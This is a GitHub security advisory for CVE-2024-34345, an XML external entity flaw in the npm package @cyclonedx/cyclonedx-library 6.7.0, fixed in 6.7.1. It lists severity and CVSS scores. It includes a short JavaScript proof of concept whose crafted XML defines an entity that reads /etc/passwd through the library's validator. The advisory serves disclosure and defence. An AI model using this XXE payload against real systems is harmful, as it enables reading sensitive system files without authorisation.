Skip to content

@cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability

High severity GitHub Reviewed Published May 8, 2024 in CycloneDX/cyclonedx-javascript-library • Updated May 14, 2024

Package

npm @cyclonedx/cyclonedx-library (npm)

Affected versions

= 6.7.0

Patched versions

6.7.1

Description

Impact

XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.

POC

const {
  Spec: { Version },
  Validation: { XmlValidator }
} = require('@cyclonedx/cyclonedx-library');

const version = Version.v1dot5;
const validator = new XmlValidator(version);
const input = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
  <components>
    <component type="library">
      <name>testing</name>
      <version>1.337</version>
      <licenses>
        <license>
          <id>&xxe;</id><!-- << XML external entity (XXE) injection -->
        </license>
      </licenses>
    </component>
  </components>
</bom>`;

// validating this forged(^) input might lead to unintended behaviour
// for the fact that the XML external entity would be taken into account.
validator.validate(input).then(ve => {
  console.error('validation error', ve);
});

Patches

This issue was fixed in @cyclonedx/cyclonedx-library@6.7.1 .

Workarounds

Do not run the provided XML validator on untrusted inputs.

References

References

Published to the GitHub Advisory Database May 8, 2024
Reviewed May 8, 2024
Published by the National Vulnerability Database May 14, 2024
Last updated May 14, 2024

Severity

High
8.1
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Weaknesses

CVE ID

CVE-2024-34345

GHSA ID

GHSA-38gf-rh2w-gmj7

Credits

Checking history
See something to contribute? Suggest improvements for this vulnerability.